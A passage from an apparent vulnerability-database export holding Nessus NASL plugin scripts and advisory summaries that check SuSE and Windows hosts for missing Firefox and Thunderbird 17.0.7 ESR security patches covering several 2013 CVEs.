is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67195);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1697\");\n\n script_name(english:\"SuSE 11.2 Security Update : Mozilla Firefox (SAT Patch Number 7976)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 17.0.7 ESR version, fixing\nbugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n - Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le. (CVE-2013-1684)\n\n - Heap-use-after-free in nsIDocument::GetRootElement.\n (CVE-2013-1685)\n\n - Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. (MFSA 2013-59 /\n CVE-2013-1697)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-49.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-50.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-51.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-53.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-54.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-55.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-59.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1682.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1684.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1685.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1687.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1690.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1692.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1693.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1697.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7976.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-branding-SLED\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"MozillaFirefox-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"MozillaFirefox-branding-SLED-7-0.6.9.31\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"MozillaFirefox-translations-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"MozillaFirefox-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"MozillaFirefox-branding-SLED-7-0.6.9.31\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"MozillaFirefox-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"MozillaFirefox-branding-SLED-7-0.6.9.31\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"MozillaFirefox-translations-17.0.7esr-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:14:23", "description": "Mozilla Firefox has been updated to the 17.0.7 ESR version, which\nfixes bugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n o Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le (CVE-2013-1684) o Heap-use-after-free in\n nsIDocument::GetRootElement (CVE-2013-1685) o\n Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. (MFSA 2013-59 /\n CVE-2013-1697)", "edition": 17, "published": "2013-07-06T00:00:00", "title": "SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 8636)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-06T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FIREFOX-20130628-8636.NASL", "href": "https://www.tenable.com/plugins/nessus/67198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67198);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1697\");\n\n script_name(english:\"SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 8636)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 17.0.7 ESR version, which\nfixes bugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n o Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le (CVE-2013-1684) o Heap-use-after-free in\n nsIDocument::GetRootElement (CVE-2013-1685) o\n Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. (MFSA 2013-59 /\n CVE-2013-1697)\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-49.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-49/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-50.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-50/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-51.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-51/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-53.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-53/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-54/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-55/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-59.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-59/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1682.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1684.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1685.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1687.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1690.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1692.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1693.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1697.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8636.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"MozillaFirefox-17.0.7esr-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"MozillaFirefox-branding-SLED-7-0.10.28\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"MozillaFirefox-translations-17.0.7esr-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"MozillaFirefox-17.0.7esr-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"MozillaFirefox-branding-SLED-7-0.10.28\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"MozillaFirefox-translations-17.0.7esr-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T04:11:00", "description": "The installed version of Thunderbird ESR 17.x is earlier than 17.0.7\nand is, therefore, potentially affected the following vulnerabilities:\n\n - Various, unspecified memory safety issues exist.\n (CVE-2013-1682)\n\n - Heap-use-after-free errors exist related to\n 'LookupMediaElementURITable',\n 'nsIDocument::GetRootElement' and 'mozilla::ResetDir'.\n (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\n - An error exists related to 'XBL scope', 'System Only\n Wrappers' (SOW) and chrome-privileged pages that could\n allow cross-site scripting attacks. (CVE-2013-1687)\n\n - An error related to 'onreadystatechange' and unmapped\n memory could cause application crashes and allow\n arbitrary code execution. (CVE-2013-1690)\n\n - The application sends data in the body of XMLHttpRequest\n (XHR) HEAD requests and could aid in cross-site request\n forgery attacks. (CVE-2013-1692)\n\n - An error related to the processing of SVG content could\n allow a timing attack to disclose information across\n domains. (CVE-2013-1693)\n\n - An error exists related to 'PreserveWrapper' and the\n 'preserved-wrapper' flag that could cause potentially\n exploitable application crashes. (CVE-2013-1694)\n\n - An error exists related to the 'toString' and 'valueOf'\n methods that could allow 'XrayWrappers' to be bypassed.\n (CVE-2013-1697)", "edition": 28, "published": "2013-06-26T00:00:00", "title": "Mozilla Thunderbird ESR 17.x < 17.0.7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_1707_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/66995", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66995);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\n \"CVE-2013-1682\",\n \"CVE-2013-1684\",\n \"CVE-2013-1685\",\n \"CVE-2013-1686\",\n \"CVE-2013-1687\",\n \"CVE-2013-1690\",\n \"CVE-2013-1692\",\n \"CVE-2013-1693\",\n \"CVE-2013-1694\",\n \"CVE-2013-1697\"\n );\n script_bugtraq_id(\n 60765,\n 60766,\n 60773,\n 60774,\n 60776,\n 60777,\n 60778,\n 60783,\n 60784,\n 60787\n );\n\n script_name(english:\"Mozilla Thunderbird ESR 17.x < 17.0.7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Thunderbird ESR\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a mail client that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Thunderbird ESR 17.x is earlier than 17.0.7\nand is, therefore, potentially affected the following vulnerabilities:\n\n - Various, unspecified memory safety issues exist.\n (CVE-2013-1682)\n\n - Heap-use-after-free errors exist related to\n 'LookupMediaElementURITable',\n 'nsIDocument::GetRootElement' and 'mozilla::ResetDir'.\n (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\n - An error exists related to 'XBL scope', 'System Only\n Wrappers' (SOW) and chrome-privileged pages that could\n allow cross-site scripting attacks. (CVE-2013-1687)\n\n - An error related to 'onreadystatechange' and unmapped\n memory could cause application crashes and allow\n arbitrary code execution. (CVE-2013-1690)\n\n - The application sends data in the body of XMLHttpRequest\n (XHR) HEAD requests and could aid in cross-site request\n forgery attacks. (CVE-2013-1692)\n\n - An error related to the processing of SVG content could\n allow a timing attack to disclose information across\n domains. (CVE-2013-1693)\n\n - An error exists related to 'PreserveWrapper' and the\n 'preserved-wrapper' flag that could cause potentially\n exploitable application crashes. (CVE-2013-1694)\n\n - An error exists related to the 'toString' and 'valueOf'\n methods that could allow 'XrayWrappers' to be bypassed.\n (CVE-2013-1697)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-49/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-50/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-51/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-54/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-56/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-59/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Thunderbird ESR 17.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1686\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item_or_exit(\"SMB/transport\");\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:TRUE, fix:'17.0.7', min:'17.0', severity:SECURITY_HOLE, xss:TRUE, xsrf:TRUE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:59", "description": "From Red Hat Security Advisory 2013:0981 :\n\nUpdated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming 